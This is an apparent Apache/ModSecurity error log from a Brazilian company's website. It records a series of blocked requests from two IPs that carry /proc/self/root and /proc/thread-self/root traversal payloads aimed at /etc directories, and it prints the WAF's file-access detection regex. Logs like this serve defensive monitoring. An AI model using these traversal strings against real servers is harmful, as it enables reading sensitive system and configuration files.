[Mon Mar 16 18:10:30.223329 2026] [:error] [pid 21806:tid 140411565680384] [client 74.7.243.203:57406] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhxxtSswJuvopo3lOh8uQAAAJU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:10:35.715522 2026] [:error] [pid 10651:tid 140411699963648] [client 74.7.243.203:47010] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhxy7ysWC90G-1nBrBhDgAAAYU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:10:42.801819 2026] [:error] [pid 14895:tid 140411540502272] [client 74.7.243.203:47026] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhx0lajLEzk2WiQ-10uoAAAApg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:10:50.775297 2026] [:error] [pid 21806:tid 140411708356352] [client 74.7.243.203:44402] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhx2tSswJuvopo3lOh82gAAAIQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:10:55.402900 2026] [:error] [pid 29507:tid 140411649607424] [client 74.7.241.46:56442] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhx30r9dMAiw-8KANNlKQAAAQs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:11:01.022591 2026] [:error] [pid 10651:tid 140411658000128] [client 74.7.241.46:50962] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhx5bysWC90G-1nBrBhFAAAAYo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:11:02.329507 2026] [:error] [pid 29802:tid 140411548894976] [client 74.7.241.46:46636] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhx5s_BxrYCr4hPDw8GewAAAdc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:11:03.543053 2026] [:error] [pid 21805:tid 140411674785536] [client 74.7.241.46:46638] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhx57ABkC4fWIHEf8ET4gAAAEg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:11:06.100205 2026] [:error] [pid 29507:tid 140411624429312] [client 74.7.243.203:49516] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhx6kr9dMAiw-8KANNlNAAAAQ4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:11:07.067516 2026] [:error] [pid 10772:tid 140411540502272] [client 74.7.241.46:46654] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhx6_9ocpUE4ed4uDwPpgAAAhg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:11:08.358468 2026] [:error] [pid 10772:tid 140411733534464] [client 74.7.241.46:45706] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhx7P9ocpUE4ed4uDwPqQAAAgE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:11:11.731751 2026] [:error] [pid 21805:tid 140411716749056] [client 74.7.241.46:45712] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhx77ABkC4fWIHEf8ET6QAAAEM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:11:20.928144 2026] [:error] [pid 21805:tid 140411658000128] [client 74.7.241.46:45716] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhx-LABkC4fWIHEf8ET8QAAAEo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:11:30.856341 2026] [:error] [pid 10831:tid 140411607643904] [client 74.7.241.46:51096] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhyAo6lpbStxTqkSkuFLwAAAlA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:11:32.213251 2026] [:error] [pid 15568:tid 140411607643904] [client 74.7.241.46:34048] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhyBKQpVkWug9HeOt9QIAAAA1A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:11:33.338179 2026] [:error] [pid 29802:tid 140411725141760] [client 74.7.241.46:34054] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhyBc_BxrYCr4hPDw8GgwAAAcI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:11:34.596305 2026] [:error] [pid 21805:tid 140411582465792] [client 74.7.241.46:34056] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhyBrABkC4fWIHEf8ET9AAAAFM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:11:35.769633 2026] [:error] [pid 15568:tid 140411708356352] [client 74.7.241.46:34072] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhyB6QpVkWug9HeOt9QIQAAA0Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:11:38.459732 2026] [:error] [pid 21805:tid 140411632822016] [client 74.7.241.46:34080] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhyCbABkC4fWIHEf8ET9gAAAE0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:11:39.747709 2026] [:error] [pid 21806:tid 140411741927168] [client 74.7.241.46:35306] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhyC9SswJuvopo3lOh9BgAAAIA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:11:40.935471 2026] [:error] [pid 29507:tid 140411716749056] [client 74.7.241.46:35316] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhyDEr9dMAiw-8KANNlNgAAAQM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:11:41.167120 2026] [:error] [pid 29507:tid 140411616036608] [client 74.7.241.46:35316] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhyDUr9dMAiw-8KANNlNwAAAQ8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
